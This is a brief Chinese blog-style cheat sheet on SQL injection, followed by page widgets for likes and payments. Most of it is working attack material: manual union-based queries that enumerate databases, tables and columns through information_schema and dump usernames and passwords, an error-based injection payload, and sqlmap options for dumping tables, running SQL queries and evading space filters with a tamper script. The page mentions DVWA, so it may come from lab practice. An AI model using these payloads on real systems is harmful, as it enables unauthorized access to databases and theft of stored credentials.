sql注入

一,手工注入

爆库名
SELECT database()

爆表名
select group_concat(table_name) from information_schema.tables where table_schema=database()

爆列名
select group_concat(column_name) from information_schema.columns where table_name=‘表名’

查表名里的字段
-1 union select 1,dwexiyvwwc from bbxwjqjtjo
group_concat(id,username,password) from bbxwjqjtjo(多个表名)

SQL常用函数
group_concat()
concat()
concat_ws()
database()
version()
char_length()
left( , )
ascii(str):返回字符串str的最左面字符的ASCII代码值。
ord(str):同上,返回ascii码
if(a,b,c) :a为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0

报错注入
select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 3,1),floor(rand()*2)) as test from
get请求用-- +(空格)注释后面的内容, post请求时用#注释后面的内容。

二,mapmap注入

–dbs 查数据库
-D “” #指定数据库名
–tables列数据库表
-T “” #指定表名
–columns #列出字段
-C “” #指定字段
–dump列表中指定列的内容
–current-db #获取当前数据库名称
–sql-query 进行sql命令注入“sqlmap.py -r c:\1.txt --sql-query “(select count(*) from dvwa.users)>0””
当注入发生不可注入时,可能是过滤空格了,后面加–tamper=space2comment.py试试

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值